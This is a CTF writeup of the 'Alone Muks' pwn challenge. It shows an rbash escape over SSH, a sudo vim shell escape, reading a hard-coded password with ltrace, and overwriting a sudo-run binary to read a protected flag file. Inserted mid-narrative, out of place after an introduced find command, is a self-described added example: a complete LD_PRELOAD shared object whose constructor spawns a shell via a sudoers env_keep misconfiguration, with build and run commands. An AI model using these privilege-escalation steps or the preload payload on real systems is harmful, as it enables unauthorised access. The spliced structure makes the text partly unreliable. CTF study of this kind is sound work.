Writeup DGSE - CTF - Alone Muks

This article describes my solution for the 100-point challenge called “Alone Muks”.

Introduction

During your recent stay in Evil Country, you managed to attach a device to the truck making the delivery.
You now need to find a flaw in the system in order to take control of the autonomous truck, made by Lates, and redirect it to an extraction point.
An agent has planted a device that gives us access to the vehicle's entertainment system. From there, work your way up to the navigation system.
Connect to the truck over SSH.

Credentials: user:user

The server is reset periodically.

Port: 5004

The flag has the form DGSESIEE{hash}

Start

So we need to connect to the server over SSH on port 5004 and try to retrieve the flag. Bear in mind that this challenge is in the pwn category, so if we break things (and we will), that is expected.

ssh -p 5004 user@challengecybersec.fr
The authenticity of host '[challengecybersec.fr]:5004 ([51.159.59.20]:5004)' can't be established.
ECDSA key fingerprint is SHA256:rpIUFQ+ekb9WdvHELYrgoggGEKupuCRxNcS5eUS03Eg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[challengecybersec.fr]:5004,[51.159.59.20]:5004' (ECDSA) to the list of known hosts.
user@challengecybersec.fr's password:
Linux 3a92d0c53adf 4.9.0-13-amd64 #1 SMP Debian 4.9.228-1 (2020-07-05) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov  4 11:51:07 2020 from 92.170.196.41
=============================================================

                 LATES Motors Inc

        LATES Mortors Entertainment System v6.2

             Please enter your credentials
=============================================================
Username: admin
Password: admin
Wrong username !
Username: admin
Password: password
Wrong username !
Username: ^CTraceback (most recent call last):
  File "/home/user/login.py", line 12, in <module>
    user = raw_input("Username: ")
KeyboardInterrupt
user@3a92d0c53adf:~$ id
-rbash: id: command not found
user@3a92d0c53adf:~$ whoami
-rbash: whoami: command not found
user@3a92d0c53adf:~$

As soon as the SSH session opens we are asked for a username and a password. I try the classic pairs admin:admin and admin:password. Rather than work through every username/password pair I could think of, I quit with Ctrl+C.

The Ctrl+C kills the login prompt (the traceback shows it is /home/user/login.py, presumably launched from one of the shell startup files; /home/user/.bash_profile turns up in the file listing later on) and leaves me at a shell prompt as user@3a92d0c53adf, so I try a couple of basic commands to find out who I am: id and whoami.

As you can see, the commands are not found, and the error prefix gives us an important piece of information: we are in a restricted shell (rbash). rbash is bash with a set of restrictions (no cd, no changing PATH or SHELL, no commands containing a slash, no output redirection) that give a much more controlled environment than the standard shell; here the PATH it leaves us evidently does not include /usr/bin, which is why even id is "not found".

The first objective is to escape the restricted shell. One way is to hand SSH a command to run instead of requesting a login session: sshd then executes it through the remote user's shell non-interactively (rbash -c sh), so the login-time setup that started login.py and trimmed our PATH is not applied, and sh is a plain command name without a slash, so rbash is happy to start it. The -t flag forces allocation of a pseudo-terminal, which ssh does not do by default when a command is given, so that sh is usable interactively.

ssh -p 5004 user@challengecybersec.fr -t "sh"
user@challengecybersec.fr's password:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

So by passing sh as the remote command (with -t to get a tty), I ask SSH to start my session in sh instead of the restricted login shell. We now have a normal, unrestricted shell.

Privilege escalation

If there is one command you should always run as soon as you land on a server over SSH, it is sudo -l. The -l flag lists the commands the invoking user (or the user given with -U) is allowed, and forbidden, to run on the current host, together with the Defaults that apply.

sudo -l
Matching Defaults entries for user on 3a92d0c53adf:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+=LD_PRELOAD

User user may run the following commands on 3a92d0c53adf:
    (globalSystem) NOPASSWD: /usr/bin/vim

In our case the entry below means that user may run /usr/bin/vim as globalSystem without a password.

(globalSystem) NOPASSWD: /usr/bin/vim

Two other details in that output are worth noting for later: secure_path fixes the PATH sudo will use, and env_keep+=LD_PRELOAD tells sudo to preserve LD_PRELOAD, a variable it normally scrubs, in the environment of the command it runs. We do not need that here, because vim on its own is enough.

As you may know, vim can run shell commands (the :! escape), so let's use that feature to become globalSystem. This is a textbook sudo privilege escalation: any sudo-able program that can spawn a shell hands over the target user.

sudo -u globalSystem vim -c "!bash"

mesg: cannot open /dev/pts/0: Permission denied
globalSystem@3a92d0c53adf:/home/user$ id
uid=1001(globalSystem) gid=1001(globalSystem) groups=1001(globalSystem)
globalSystem@3a92d0c53adf:/home/user$

The -u flag tells sudo which user to run the command as, and vim's -c flag runs an ex command on startup; !bash is vim's shell-escape command, so vim spawns bash as globalSystem. The mesg warning is harmless: it is the new user's shell startup trying to change the write permission of a tty that still belongs to user.

Here we are! The id command confirms that we are now globalSystem.

Pwn

As mentioned before, let’s list again what can be done with the sudo command.

globalSystem@3a92d0c53adf:/home/user$ sudo -l
Matching Defaults entries for globalSystem on 3a92d0c53adf:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    env_keep+=LD_PRELOAD

User globalSystem may run the following commands on 3a92d0c53adf:
    (navigationSystem) NOPASSWD: /usr/bin/update

This entry means that globalSystem may run /usr/bin/update as navigationSystem without a password (the same Defaults, including env_keep+=LD_PRELOAD, apply to this rule too).

In this type of challenge the flag is usually somewhere in a user's home directory, /home/<user>. The following command lists every regular file under /home.
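The sudo -l output also supports a second route to navigationSystem that does not depend on the update password at all. Because the Defaults line keeps LD_PRELOAD, and /usr/bin/update is not a setuid binary, the dynamic loader will honour an LD_PRELOAD passed through sudo and run a constructor from our library before update's main() ever executes its password check. The shared object below is an added example and is not part of the original writeup; it assumes a C compiler is available on the box (or that you build it locally against the same amd64 Debian libc and scp it over), and the path /dev/shm/preload.so is an arbitrary choice.

```c
/* preload.c: payload for a sudoers "env_keep+=LD_PRELOAD" misconfiguration.
 *
 * Build:  gcc -shared -fPIC -o /dev/shm/preload.so preload.c
 * Run, as globalSystem (path /dev/shm/preload.so is an assumption):
 *   sudo -u navigationSystem LD_PRELOAD=/dev/shm/preload.so /usr/bin/update
 *
 * sudo's env_reset would normally drop LD_PRELOAD, but env_keep puts it into
 * the environment of the command it runs as navigationSystem. /usr/bin/update
 * is an ordinary (non-setuid) binary, so ld.so loads this library and runs the
 * constructor below before update's main(): the password check never happens.
 */
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

/* Fire only when we really are inside a sudo-launched command: sudo sets
 * SUDO_USER for its child, and LD_PRELOAD is present because env_keep kept it.
 * Linked into anything else (for instance a test program) the payload is inert. */
int injected_via_sudo(const char *ld_preload, const char *sudo_user)
{
    return ld_preload != NULL && ld_preload[0] != '\0'
        && sudo_user != NULL && sudo_user[0] != '\0';
}

__attribute__((constructor))
static void spawn_shell(void)
{
    if (!injected_via_sudo(getenv("LD_PRELOAD"), getenv("SUDO_USER")))
        return;

    /* Drop LD_PRELOAD so the shell, and everything started from it, is not
     * re-injected with this library. */
    unsetenv("LD_PRELOAD");

    /* sudo already switched both real and effective uid/gid to the target
     * user, so the shell inherits navigationSystem's identity as-is. */
    execl("/bin/bash", "bash", "-i", (char *)NULL);

    /* Only reached if exec failed: fall through and let update run normally. */
}
```

Two practical points. The variable has to be given on sudo's own command line (sudo VAR=value cmd) rather than exported in front of it: sudo is setuid, so the loader discards LD_PRELOAD from sudo's own environment, whereas a command-line assignment is parsed by sudo itself and accepted because the name is on the env_keep list. And the guard on SUDO_USER means a stray copy of the library does nothing when it is loaded outside sudo, which keeps the payload from hijacking your own shells while you are testing it.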

globalSystem@3a92d0c53adf:/home/user$ find /home/ -type f
/home/user/.bash_logout
/home/user/.bashrc
/home/user/.profile
/home/user/bin/du_
/home/user/.bash_profile
/home/user/login.py
/home/navigationSystem/flag.txt
/home/navigationSystem/.bash_logout
/home/navigationSystem/.bashrc
/home/navigationSystem/.profile
/home/globalSystem/.bash_logout
/home/globalSystem/.bashrc
/home/globalSystem/.profile

Did you spot flag.txt in /home/navigationSystem? That is almost certainly our flag.

But we got a little side-tracked. Remember that globalSystem can run /usr/bin/update as navigationSystem without a password. Let's give it a try.

globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update
usage : /usr/bin/update password
globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update test
Wrong password

We need a password to get anywhere with this command. To analyse the binary we first have to get hold of it: copy it to /dev/shm, a world-writable location where the copy will be readable by our original user account, so that it can be pulled down with scp as user.

cp /usr/bin/update /dev/shm/

Then on your local computer.

scp -P 5004 user@challengecybersec.fr:/dev/shm/update .

Let's trace the library calls the binary makes while checking a wrong password. ltrace shows the comparison of our argument against a hard-coded string:

ltrace ./update test
[...]
strcmp("AloneIsTheBest", "test")   = -32
puts("Wrong password"Wrong password

The password seems to be AloneIsTheBest: the binary compares its argument against that constant with a plain strcmp, so the secret lives in clear inside the executable (if it is stored as a plain literal, strings ./update would reveal it as well). Let's try it for real!

globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update AloneIsTheBest
Deploying upgrade vehicle, please wait
[####                             ] 8%
Deploying upgrade vehicle, please wait
[#####                            ] 8%
Deploying upgrade vehicle, please wait
[#####                            ] 8%
Deploying upgrade vehicle, please wait
[#####                            ] 8%
Deploying upgrade vehicle, please wait
[#####                            ] 8%
Deploying upgrade vehicle, please wait
[#####                            ] 8%

The vehicle upgrade never gets past 8%, yet another feature developed by Microsoft…

Don't forget that this is a pwn challenge: there is something to break. The file /home/navigationSystem/flag.txt belongs to navigationSystem and is readable only by its owner (-r--------).

globalSystem@b43e27468d7b:/home/user$ ls -lah /home/navigationSystem/flag.txt
-r-------- 1 navigationSystem navigationSystem 43 Nov  1 10:52 /home/navigationSystem/flag.txt

The actual weakness is that /usr/bin/update, the very file sudo lets us run as navigationSystem, can be overwritten by globalSystem (either the file itself or its directory is writable; check with ls -l /usr/bin/update before trying, as the writeup did not capture that output, although the overwrite below succeeds). Keep the copy in /dev/shm if you want to restore the original afterwards. The plan is to replace the contents of /usr/bin/update with the following script.

#! /usr/bin/env bash
/bin/cat /home/navigationSystem/flag.txt

Because sudo runs /usr/bin/update as navigationSystem, the script reads /home/navigationSystem/flag.txt with that user's rights; no password argument is needed any more since the original check is gone.

globalSystem@3a92d0c53adf:~$ sudo -u navigationSystem /usr/bin/update
DGSESIEE{44adfb64ff382f6433eeb03ed829afe0}

Mission accomplished: we read the file containing the flag and can validate the challenge.